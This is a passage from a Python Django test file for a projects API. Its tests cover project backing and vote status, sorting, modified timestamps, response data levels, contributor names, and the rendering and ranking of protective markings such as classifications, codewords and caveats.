self.assertEquals(len(tags), 3)
#@utils.override_settings(DEBUG=True)
class Test_Back_Actions(Test_Authentication_Base):
def setUp(self):
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
self.user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
self.user_id2, self.api_key2 = self.add_user(email='dave@dave.com', first_name='dave', last_name='david')
self.headers2 = self.build_headers(self.user_id2, self.api_key2)
# Add a doc
doc = {"title" : "First project.",
"description" : "This is the first project in a series of good projects.",
"status" : "published",
"related_ideas" : []}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.resource_uri = response['location']
self.assertEqual(response.status_code, 201)
def test_attempt_to_back_a_draft_project(self):
""" Code should stop the user attempting to backing a draft project - only allowed on published."""
# Change that project status to be draft via the db directly
doc_id = self.resource_uri.strip('/').split('/')[-1]
documents.Project.objects.get(id=doc_id).update(**{'set__status': 'draft'})
# Without the trailing slash results in 301 status_code
backs_uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
# Try backing the draft project
response = self.c.post(backs_uri, json.dumps({"comment" : {"title":"very good project. I support."}}), content_type='application/json', **self.headers2)
# The back should be rejected
self.assertEquals(response.status_code, 400)
def test_back_a_project_catch_single_user(self):
""" As the same user, attempt to back a project twice
and fail to do so. Resultant back array remains 1 long."""
# Without the trailing slash results in 301 status_code
backing_uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
# Try adding new backs
# No user provided - picked up automatically
new_backings = [{"comment" : {"title":"very good project. I support."}},
{"comment" : {"title": "ditto - great project."}}]
for back in new_backings:
self.c.post(backing_uri, json.dumps(back), content_type='application/json', **self.headers2)
# Now make sure there is only 1 back
response = self.c.get(backing_uri, **self.headers)
content = json.loads(response.content)['objects']
self.assertEquals(len(content), 1)
self.assertEquals(content[0]['user'], self.user_id2.username)
# Make sure the back count is correct
response = self.c.get(self.resource_uri, **self.headers)
self.assertEquals(json.loads(response.content)['objects'][0]['back_count'], 1)
def test_back_a_project_2_users(self):
""" userA backs an project. UserA tries to back it again - it should fail.
userB backs an project and it registers. """
# Add a 3rd user (now 1 staff, 2 users)
user_id3, api_key3 = self.add_user(email='sue@dave.com', first_name='sue', last_name='mcgrew')
self.headers3 = self.build_headers(user_id3, api_key3)
# Without the trailing slash results in 301 status_code
back_uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
# Try adding new backs
# No user provided - picked up automatically
# Only 2 of these should go in because user 1 can't back something twice
self.c.post(back_uri, json.dumps({"comment":{"title":"cool"}}), content_type='application/json', **self.headers2)
self.c.post(back_uri, json.dumps({"comment":{"title":"fun"}}), content_type='application/json', **self.headers2)
self.c.post(back_uri, json.dumps({"comment":{"title":"nice"}}), content_type='application/json', **self.headers3)
# Now make sure there are 2 backs with different users
response = self.c.get(back_uri, **self.headers)
content = json.loads(response.content)['objects']
self.assertEquals(len(content), 2)
self.assertEquals(content[0]['user'], self.user_id2.username)
self.assertEquals(content[1]['user'], user_id3.username)
# Make sure the back count is correct
response = self.c.get(self.resource_uri, **self.headers)
self.assertEquals(json.loads(response.content)['objects'][0]['back_count'], 2)
def test_user_backs_project_and_then_revokes_by_delete(self):
""" userA backS an project. UserA tries to back it instead - it should SUCCEED. """
# back
back_uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
self.c.post(back_uri, json.dumps({"comment":{"title":"cool"}}), content_type='application/json', **self.headers)
# Check it registered
response = self.c.get(back_uri, **self.headers)
content = json.loads(response.content)['objects']
self.assertEquals(len(content), 1)
back_exact_uri = content[0]['resource_uri']
# Delete the backing
response = self.c.delete(back_exact_uri, **self.headers)
self.assertEquals(response.status_code, 204)
# Make sure it got dropped
response = self.c.get(back_uri, **self.headers)
content = json.loads(response.content)['objects']
self.assertEquals(len(content), 0)
def test_back_comment_stored_in_comments_model(self):
""" Check that a Back comment gets stored in the comments model, not as a vote subdoc """
# Without the trailing slash results in 301 status_code
backs_uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
comments_uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'comments/'
new_comment = {"comment" : {"title" : "heres a new comment",
"body" : "heres the body of a new comment",
"protective_marking" : {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : '',
"national_caveats_members" : [],
"codewords" : ['BANANA 1', 'BANANA 2'],
"codewords_short" : ['B1', 'B2'],
"descriptor" : 'PRIVATE'}
}
}
# Try adding a new backing with comment
self.c.post(backs_uri, json.dumps(new_comment), content_type='application/json', **self.headers)
# Now make sure the back's comment landed in the comments
response = self.c.get(comments_uri, **self.headers)
content = json.loads(response.content)['objects']
self.assertEquals(content[0]['user'], self.user.username)
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **self.headers)
# ['objects'][0] - because detail level has a meta object
doc = json.loads(response.content)['objects'][0]
self.assertEquals(len(doc['comments']), 1)
self.assertEquals(doc['comment_count'], 1)
self.assertEquals(doc['comments'][0]['type'], 'back')
self.assertEquals(len(doc['backs']), 1)
self.assertEquals(doc['back_count'], 1)
def test_attempted_back_spoof_fake_user(self):
""" Mimics someone attemtpting to increment back by submitting a fake user """
# The user that is recorded in the db isn't fake_back@xyz.com
backs_uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
fake_data = {'user':'fake_back@xyz.com'}
self.c.post(backs_uri, json.dumps(fake_data), content_type='application/json', **self.headers)
# Make sure the recorded user is the authenticated user, not the spoofed one
response = self.c.get(backs_uri, **self.headers)
self.assertEquals(json.loads(response.content)['objects'][0]['user'], self.user.username)
def test_get_user_vote_status_back(self):
""" Check that the API returns the user_backed field """
uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
self.c.post(uri, json.dumps({}), content_type='application/json', **self.headers)
# Check the user vote is the correct value
response = self.c.get(self.resource_uri, **self.headers)
self.assertEquals(json.loads(response.content)['objects'][0]['user_backed'], 1)
def test_get_user_vote_status_not_backed(self):
""" Check that the API returns the user_backed field """
# Check the user vote is the correct value
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **self.headers)
self.assertEquals(json.loads(response.content)['objects'][0]['user_backed'], 0)
def test_user_vote_issue45_case1(self):
"""
Re-creating this action on the front-end
-----------------------------------------
UserA logs in - not actually required in the tests (API auth)
UserA votes on (backs) project_001
Check user_backed for project_001 - should be 1
UserA logs out
UserB logs in - not actually required in the tests (API auth)
UserB opens project_001
Check user_backed for project_001 - should be 0
UserB votes on (backs) project_001
Check user_backed for project_001 - should be 1
"""
# Create UserA
userA, userA_api_key = self.add_user(email="a@a.com", first_name="a", last_name="user_a")
userA_headers = self.build_headers(userA, userA_api_key)
# UserA backs an project
uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
x = self.c.post(uri, json.dumps({}), content_type='application/json', **userA_headers)
# Check the user_backed is correct
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **userA_headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['user_backed'], 1)
# Create UserB
userB, userB_api_key = self.add_user(email="b@b.com", first_name="b", last_name="user_b")
userB_headers = self.build_headers(userB, userB_api_key)
# UserB shouldn't have backed anything yet
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **userB_headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['user_backed'], 0)
# UserB backs something
uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
x = self.c.post(uri, json.dumps({}), content_type='application/json', **userB_headers)
# UserB now has user_backed of 1
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **userB_headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['user_backed'], 1)
def test_user_vote_issue45_case2(self):
""" UserA logs in
UserA votes on (backs) project_001
Check user_backed for project_001 - should be 1
UserA logs out
Anonymous opens project_001
Check user_backed for project_001 - should be 0
UserB logs in - not actually required in the tests (API auth)
UserB opens project_001
Check user_backed for project_001 - should be 0
UserB votes on (backs) project_001
Check user_backed for project_001 - should be 1
"""
# Create UserA
userA, userA_api_key = self.add_user(email="a@a.com", first_name="a", last_name="user_a")
userA_headers = self.build_headers(userA, userA_api_key)
# UserA backs an project
uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
x = self.c.post(uri, json.dumps({}), content_type='application/json', **userA_headers)
# Check the user_backed is correct
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **userA_headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['user_backed'], 1)
# AnonymousUser shouldn't have a user_backed yet
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['user_backed'], 0)
# And now UserB just to be sure...
userB, userB_api_key = self.add_user(email="b@b.com", first_name="b", last_name="user_b")
userB_headers = self.build_headers(userB, userB_api_key)
# UserB shouldn't have backed anything yet
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **userB_headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['user_backed'], 0)
# UserB backs something
uri = self.fullURItoAbsoluteURI(self.resource_uri) + 'backs/'
x = self.c.post(uri, json.dumps({}), content_type='application/json', **userB_headers)
# UserB now has user_backed of 1
response = self.c.get(self.fullURItoAbsoluteURI(self.resource_uri), **userB_headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['user_backed'], 1)
#===============================================================================
# DIFFERENT WAYS OF QUERYING THE COMMENTS API - by user? by title?
#===============================================================================
#===============================================================================
# TODO: Check that a null classification can be posted - for when we drop that.
#===============================================================================
#@utils.override_settings(DEBUG=True)
class Test_Project_Sorting(Test_Authentication_Base):
def setUp(self):
""" Add in some documents"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
self.user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
self.doc_ids = []
# Insert 10 docs
for i in range(10):
doc = {"title": "Project #%s"%(i), "status":"published", "description": "First project description in here."}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
if response.status_code == 201:
self.doc_ids.append(response['location'])
# Check they went in OK
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
self.assertEquals(len(content['objects']), 10)
def test_doc_asc_created_sort(self):
"""Sort results by date in asc order """
response = self.c.get('/api/v1/project/?order_by=created', **self.headers)
meta, objects = self.get_meta_and_objects(response)
for i in range(1, len(objects)):
this = datetime.datetime.strptime(objects[i]['created'], '%Y-%m-%dT%H:%M:%S.%f')
prev = datetime.datetime.strptime(objects[i-1]['created'], '%Y-%m-%dT%H:%M:%S.%f')
self.assertTrue(prev < this)
def test_doc_desc_created_sort(self):
""" Sort results by date in descending order. """
response = self.c.get('/api/v1/project/?order_by=-created', **self.headers)
meta, objects = self.get_meta_and_objects(response)
for i in range(1, len(objects)):
this = datetime.datetime.strptime(objects[i]['created'], '%Y-%m-%dT%H:%M:%S.%f')
prev = datetime.datetime.strptime(objects[i-1]['created'], '%Y-%m-%dT%H:%M:%S.%f')
self.assertTrue(prev > this)
def test_doc_back_count_sort_desc(self):
""" Sort results by back count in descending order. """
# Add some backs
for i in range(len(self.doc_ids)-1):
backs_uri = self.fullURItoAbsoluteURI(self.doc_ids[i]) + 'backs/'
# Add a different number of backs for each project
x = i + 1
for j in range(1, x+2):
# Add a different user each time
user_id, api_key = self.add_user(email='%s@blah.com'%(j))
headers = self.build_headers(user_id, api_key)
try:
resp = self.c.post(backs_uri, json.dumps({'comment':{"title":'cool %s'%(j)}}), content_type='application/json', **headers)
except Exception as e:
print(e)
response = self.c.get('/api/v1/project/?order_by=back_count', **self.headers)
meta, objects = self.get_meta_and_objects(response)
for x in range(len(objects)-1):
this_back_count = objects[x]['back_count']
next_back_count = objects[x+1]['back_count']
if this_back_count and next_back_count:
self.assertGreater(next_back_count, this_back_count)
## MORE TESTS FOR DIFFERENT SORT FIELDS ##
#@utils.override_settings(DEBUG=True)
class Test_Check_Modified(Test_Authentication_Base):
def setUp(self):
""" Add in some documents"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
number_projects = 3
# Insert a few docs, each with a different number of comments
for i in range(number_projects):
doc = {"title": "Project #%s"%(i), "description": "First project description in here.", "status": "published"}
#resp = self.c.get(self.resourceListURI('project'), **self.headers)
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
main_project = response['location']
self.assertEquals(response.status_code, 201)
comments_uri = self.fullURItoAbsoluteURI(main_project) + 'comments/'
# Try adding new comments
for j in range (3):
new_comment = {"user" : "rich@rich.com",
"body" : "#%s perhaps we could extend that project by..."%(j),
"title" : "and what about adding to that project with %s..."%(j),
"protective_marking" : {"classification":"unclassified","descriptor":""}}
resp = self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers)
self.assertEquals(resp.status_code, 201)
# Wait to ensure we have a different time
time.sleep(0.5)
# Check they went in OK
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
self.assertEquals(len(content['objects']), number_projects)
def retrieve_most_recent_timestamp(self, objects):
"""Gets the most recent timestamp"""
dates = []
for obj in objects:
dates += [datetime.datetime.strptime(obj['created'], '%Y-%m-%dT%H:%M:%S.%f'), datetime.datetime.strptime(obj['modified'], '%Y-%m-%dT%H:%M:%S.%f')]
return max(dates)
def test_update_project_modified_ts_field_on_POST(self):
""" Checks that the Project API updates the modified timestamp field when part of the project is changed"""
# Get all data
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
project_0 = content['objects'][0]
old_title = project_0['title']
old_ts = project_0['modified']
# Patch a new title - partial addition which leaves the rest in place correctly.
new_title = {"title":"this is a major change to the title because it was offensive..."}
response = self.c.patch(self.fullURItoAbsoluteURI(project_0['resource_uri']), json.dumps(new_title), content_type='application/json', **self.headers)
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
# Retrieve the first project again
project_0 = content['objects'][0]
new_stored_title = project_0['title']
# Check its not the same as the previous one and is the intended new one
self.assertNotEqual(old_title, new_stored_title)
self.assertEqual(new_title['title'], new_stored_title)
# Check the timestamps
new_ts = project_0['modified']
self.assertGreater(new_ts, old_ts)
def test_update_project_modified_ts_field_on_POST_to_comment(self):
""" Checks that the Project API updates the modified timestamp field when part of the project is changed.
Mods to the comments/backs will change the overall objects modified date."""
# Get all data
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
project_x = content['objects'][-1]
project_old_ts = project_x['modified']
first_comment = project_x['comments'][0]
# Patch a new title - partial addition which leaves the rest in place correctly.
new_comment_title = {"title":"this is a major change to the title because it was offensive..."}
response = self.c.patch(first_comment['resource_uri'], json.dumps(new_comment_title), content_type='application/json', **self.headers)
time.sleep(1)
# After a short sleep, get the projects again
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
project_x = content['objects'][-1]
# Get the modified time for the Project
project_new_ts = project_x['modified']
# Get the first comment again
new_first_comment = project_x['comments'][0]
# Check that the new first comment title is what we tried to change it to
self.assertEqual(new_first_comment['title'], new_comment_title['title'])
# Check that the project modified ts has changed.
self.assertGreater(project_new_ts, project_old_ts)
def test_check_project_modified_is_correct(self):
"""Checks that the project level modified is correct """
response = self.c.get('/api/v1/project/', **self.headers)
meta, objects = self.get_meta_and_objects(response)
for project in objects:
most_recent_comment = self.retrieve_most_recent_timestamp(project['comments'])
self.assertEquals(most_recent_comment.strftime('%Y-%m-%dT%H:%M:%S'),
datetime.datetime.strptime(project['modified'], '%Y-%m-%dT%H:%M:%S.%f').strftime('%Y-%m-%dT%H:%M:%S'))
def test_check_meta_modified_is_correct(self):
"""Checks that the meta-level modified is correct """
response = self.c.get('/api/v1/project/', **self.headers)
meta, objects = self.get_meta_and_objects(response)
most_recent_project = self.retrieve_most_recent_timestamp(objects)
most_recent_comment = datetime.datetime.utcnow() - datetime.timedelta(days=1000)
for project in objects:
most_recent_comment = max([self.retrieve_most_recent_timestamp(project['comments']), most_recent_comment])
most_recent = max([most_recent_project, most_recent_comment])
self.assertEquals(most_recent, datetime.datetime.strptime(meta['modified'], '%Y-%m-%dT%H:%M:%S.%f'))
def test_update_project_tag_count(self):
""" Check that the tag count changes if its edited."""
# Get all data
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
project_0 = content['objects'][0]
old_tags = project_0['tags']
old_tag_count = project_0['tag_count']
self.assertEquals(old_tag_count, 0)
# Patch some tags in, having forgotten them first time round
add_tags = {"tags" : ["physics","maths","geography","sports","english"]}
response = self.c.patch(self.fullURItoAbsoluteURI(project_0['resource_uri']), json.dumps(add_tags), content_type='application/json', **self.headers)
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
# Retrieve the project
project_0 = content['objects'][0]
new_tags = project_0['tags']
new_tag_count = project_0['tag_count']
# Check its not the same as the previous one and is the intended new one
self.assertNotEqual(old_tags, new_tags)
self.assertEqual(new_tag_count, 5)
#@utils.override_settings(DEBUG=True)
class Test_Data_Level_Responses(Test_Authentication_Base):
def setUp(self):
""" Add in some documents"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
# Insert a few docs, each with comments and a back
for i in range(3):
doc = {"title": "Project #%s"%(i),"status":"published", "description": "First project description in here."}
# POST the project
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
main_project = response['location']
comments_uri = self.fullURItoAbsoluteURI(main_project) + 'comments/'
# Try adding new comments
for j in range (5):
new_comment = {"user" : "rich@rich.com",
"body" : "#%s perhaps we could extend that project by..."%(j),
"title" : "and what about adding to that project with %s..."%(j),
"protective_marking" : {"classification":"unclassified","descriptor":""}}
# POST the comment
self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers)
backs_uri = self.fullURItoAbsoluteURI(main_project) + 'backs/'
new_backs = {"user" : "dave@dave.com",
"comment" : {"title":"this is one of the worst projects ever - someone else tried this and it failed."}}
response = self.c.post(backs_uri, json.dumps(new_backs), content_type='application/json', **self.headers)
# Check they went in OK
content = json.loads(self.c.get(self.resourceListURI('project'), **self.headers).content)
def test_response_data_test_set_list(self):
"""Check that we get back the expected set of fields"""
response = self.c.get('/api/v1/project/?data_level=proj_test', **self.headers)
meta, data = self.get_meta_and_objects(response)
data_response_keys = data[0].keys()
for fld in settings.RESPONSE_FIELDS['proj_test']:
self.assertTrue(fld in data_response_keys)
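# For reference, RESPONSE_FIELDS is assumed here to be a settings dict that
# maps a data_level name to the whitelist of fields serialised at that level,
# e.g. (illustrative values only, not the real configuration):
#
#   RESPONSE_FIELDS = {'proj_test': ['id', 'title', 'description_snippet',
#                                    'created', 'modified', 'status']}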
def test_response_data_test_set_meta(self):
"""Check that we get back the expected set of fields"""
response = self.c.get('/api/v1/project/?data_level=meta', **self.headers)
content = json.loads(response.content)
self.assertNotIn('data', content)
self.assertIn('meta', content)
def test_response_data_check_comments_modified(self):
"""Is there a meta.modified for a /project/<id>/comments/ call?"""
response = self.c.get('/api/v1/project/?data_level=meta', **self.headers)
content = json.loads(response.content)
self.assertIn('meta', content)
self.assertTrue(content['meta']['modified'])
#@utils.override_settings(DEBUG=True)
class Test_Contributor_Naming(Test_Authentication_Base):
def setUp(self):
""" Add in some documents"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
# We need another user for comments
user_id2, api_key2 = self.add_user(email='dave@davison.com', first_name='dave', last_name='davidson')
self.headers2 = self.build_headers(user_id2, api_key2)
# We also need a 3rd user because of the unique constraint (applied in code logic) on backs fields
user_id3, api_key3 = self.add_user(email='john@cleese.com', first_name='john', last_name='cleese')
self.headers3 = self.build_headers(user_id3, api_key3)
# Insert a few docs, each with comments and a back
for i in range(3):
doc = {"title": "Project #%s"%(i), "description": "First project description in here.", "status": "published"}
# POST the project
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
main_project = response['location']
comments_uri = self.fullURItoAbsoluteURI(main_project) + 'comments/'
# Try adding new comments
for j in range (5):
new_comment = {"body" : "#%s perhaps we could extend that project by..."%(j),
"title" : "and what about adding to that project with %s..."%(j),
"protective_marking" : {"classification":"unclassified","descriptor":""}}
# POST the comment
self.c.post(comments_uri, json.dumps(new_comment), content_type='application/json', **self.headers2)
backs_uri = self.fullURItoAbsoluteURI(main_project) + 'backs/'
response = self.c.post(backs_uri, json.dumps({}), content_type='application/json', **self.headers3)
def test_project_contributor_name(self):
""" Check the project has a contribtor name """
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['contributor_name'], 'Bob Roberts')
def test_comment_contributor_name(self):
""" Check the comment has a contribtor name """
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['comments'][0]['contributor_name'], 'Dave Davidson')
def test_backs_contributor_name(self):
""" Check the backs has a contribtor name """
response = self.c.get(self.resourceListURI('project'), **self.headers)
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['backs'][0]['contributor_name'], 'John Cleese')
#@utils.override_settings(DEBUG=True)
class Test_Project_With_Protective_Markings(Test_Authentication_Base):
def setUp(self):
""" Add in some documents"""
# Add a user and gain access to the API key and user
self.user_id, self.api_key = self.add_user("staff_user1@projects.com")
user = self.give_privileges(self.user_id, priv='staff')
self.headers = self.build_headers(self.user_id, self.api_key)
def test_submit_full_pm(self):
""" Submit a complete protective marking """
doc = {"title": "Project #1",
"description": "First project description in here.",
"status" : "published",
"protective_marking" : {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
"national_caveats_primary_name" : 'ME ONLY',
"national_caveats_members" : [],
"codewords" : ['BANANA 1', 'BANANA 2'],
"codewords_short" : ['B1', 'B2'],
"descriptor" : 'PRIVATE'}
}
# POST the project
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['protective_marking']['classification'], 'PUBLIC')
self.assertEquals(objects[0]['protective_marking']['pretty_pm'], 'PUBLIC [PRIVATE] BANANA 1/BANANA 2 ME ONLY')
# Check that it also comes out in the project-level content
self.assertEquals(objects[0]['pretty_pm'], 'PUBLIC [PRIVATE] BANANA 1/BANANA 2 ME ONLY')
def test_submit_classification(self):
""" Submit a classification """
doc = {"title": "Project #1",
"description": "First project description in here.",
"status": "published",
"protective_marking" : {"classification" : "PUBLIC",
"classification_short" : "PU",
"classification_rank" : 0,
}
}
# POST the project
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['protective_marking']['classification'], 'PUBLIC')
self.assertEquals(objects[0]['protective_marking']['pretty_pm'], 'PUBLIC')
def test_submit_national_caveats(self):
""" Submit a national caveat """
doc = {"title": "Project #1",
"description": "First project description in here.",
"status":"published",
"protective_marking" : {"national_caveats_primary_name" : 'ME ONLY',
"national_caveats_members" : ['1', '2', '3'],
}
}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['protective_marking']['national_caveats_primary_name'], 'ME ONLY')
self.assertEquals(objects[0]['protective_marking']['national_caveats_members'], ['1','2','3'])
self.assertEquals(objects[0]['protective_marking']['pretty_pm'], 'CLASSIFICATION NOT KNOWN ME ONLY')
def test_submit_codewords(self):
""" Submit a codeword """
doc = {"title": "Project #1",
"description": "First project description in here.",
"status":"published",
"protective_marking" : {"codewords" : ['BANANA 1', 'BANANA 2'],
"codewords_short" : ['B1', 'B2']}
}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['protective_marking']['codewords'], ['BANANA 1', 'BANANA 2'])
self.assertEquals(objects[0]['protective_marking']['codewords_short'], ['B1', 'B2'])
self.assertEquals(objects[0]['protective_marking']['pretty_pm'], 'CLASSIFICATION NOT KNOWN BANANA 1/BANANA 2')
def test_submit_descriptors(self):
""" Submit descriptors """
doc = {"title": "Project #1",
"description": "First project description in here.",
"status":"published",
"protective_marking" : {"descriptor" : 'PRIVATE'}
}
response = self.c.post(self.resourceListURI('project'), json.dumps(doc), content_type='application/json', **self.headers)
self.assertEquals(response.status_code, 201)
response = self.c.get(self.resourceListURI('project'))
meta, objects = self.get_meta_and_objects(response)
self.assertEquals(objects[0]['protective_marking']['descriptor'], 'PRIVATE')
self.assertEquals(objects[0]['protective_marking']['pretty_pm'], 'CLASSIFICATION NOT KNOWN [PRIVATE]')
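# The assertions above pin down the pretty_pm rendering:
# 'CLASSIFICATION [DESCRIPTOR] CODEWORD1/CODEWORD2 CAVEAT', with
# 'CLASSIFICATION NOT KNOWN' substituted when no classification is supplied.
# A minimal sketch consistent with those assertions (an illustration only,
# not the implementation under test):
def _sketch_pretty_pm(pm):
    parts = [pm.get('classification') or 'CLASSIFICATION NOT KNOWN']
    if pm.get('descriptor'):
        parts.append('[%s]' % pm['descriptor'])
    if pm.get('codewords'):
        parts.append('/'.join(pm['codewords']))
    if pm.get('national_caveats_primary_name'):
        parts.append(pm['national_caveats_primary_name'])
    return ' '.join(parts)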
#@utils.override_settings(DEBUG=True)
class Test_Get_All_PMs(TestCase):
def setUp(self):
self.sample_pms = [{'classification':'public','classification_short':'PU'},
{'classification':'group','classification_short':'GR'},
{'classification':'private','classification_short':'PR'},
{'classification':'personal','classification_short':'PE'}]
# Build up a PM
self.pm = documents.ProtectiveMarking(classification='PUBLIC',
classification_short='PU',
classification_rank=0,
descriptor='BUSINESS',
codewords=['THIS','THAT'],
codewords_short=['T1','T2'],
national_caveats_primary_name='ME ONLY',
national_caveats_members=['1','2','3'],
national_caveats_rank=2)
#===============================================================================
#
# COMMENTED BECAUSE I CAN'T WORK OUT HOW TO BUILD A BUNDLE INSIDE A TEST
#
# def test_get_pm_from_top_level_only(self):
# """Retrieves pms from a set of objects."""
#
# docs = []
# for i in range(4):
#
# new_pm = copy.deepcopy(self.pm)
# new_pm['classification'] = self.sample_pms[i]['classification']
# new_pm['classification_short'] = self.sample_pms[i]['classification_short']
#
# doc = documents.Project(title ='new project', protective_marking = new_pm)
# #print doc.to_json()
#
# docs.append(doc)
#
# pm_list = api.get_all_pms(docs)
#
# self.assertEquals(len(pm_list), 4)
#
#
# def test_get_pm_from_top_level_and_nested(self):
# """Retrieves pms from a set of objects and sub objects."""
#
# docs = []
#
# for i in range(4):
#
# new_pm = copy.deepcopy(self.pm)
# new_pm['classification'] = self.sample_pms[i]['classification']
# new_pm['classification_short'] = self.sample_pms[i]['classification_short']
#
# # Loop and create some comments
# comments = [documents.Comment(title='new comment', body='great project', protective_marking=new_pm) for i in range(3)]
#
# # Create the document
# doc = documents.Project(title ='new project',
# comments=comments,
# protective_marking=new_pm)
# docs.append(doc)
#
# pm_list = api.get_all_pms(docs)
#
# self.assertEquals(len(pm_list), 16)
#
#===============================================================================
def test_get_max_pm_inject_O(self):
"""Retrieves the max pm"""
pm_list = []
for i in range(3):
pm = copy.deepcopy(self.pm)
pm_list.append(pm)
max_pm = api.get_max_pm(pm_list)
self.assertEquals(max_pm['classification'], 'PUBLIC')
def test_get_max_pm_inject_S(self):
"""Retrieves the max pm"""
pm_list = []
for i in range(3):
pm = copy.deepcopy(self.pm)
pm_list.append(pm)
pm_list[0]['classification']='PRIVATE'
pm_list[0]['classification_short']='PR'
pm_list[0]['classification_rank']=2
max_pm = api.get_max_pm(pm_list)
self.assertEquals(max_pm['classification'], 'PRIVATE')
def test_get_max_pm_inject_TS(self):
"""Retrieves the max pm"""
pm_list = []
for i in range(3):
pm = copy.deepcopy(self.pm)
pm_list.append(pm)
pm_list[0]['classification']='PRIVATE'
pm_list[0]['classification_short']='PR'
pm_list[0]['classification_rank']=2
pm_list[1]['classification']='PERSONAL'
pm_list[1]['classification_short']='PE'
pm_list[1]['classification_rank']=3
max_pm = api.get_max_pm(pm_list)
self.assertEquals(max_pm['classification'], 'PERSONAL')
def test_get_max_pm_nat_cavs(self):
"""Retrieves the max pm - check national cavs"""
pm_list = []
for i in range(3):
pm = copy.deepcopy(self.pm)
pm_list.append(pm)
pm_list[0]['national_caveats_primary_name']='HIM ONLY'
pm_list[0]['national_caveats_members']= ['1','2']
pm_list[0]['national_caveats_rank']=3
max_pm = api.get_max_pm(pm_list)
self.assertEquals(max_pm['national_caveats_primary_name'], 'HIM ONLY')
self.assertEquals(max_pm['national_caveats_members'], ['1','2'])
self.assertEquals(max_pm['national_caveats_rank'], 3)
def test_get_max_pm_multiple_descriptors(self):
"""Retrieves the max pm"""
descriptors=['LOCSEN','PRIVATE','PERSONAL']
pm_list = []
for i in range(3):
pm = copy.deepcopy(self.pm)
pm['descriptor']=descriptors[i]
pm_list.append(pm)
max_pm = api.get_max_pm(pm_list)
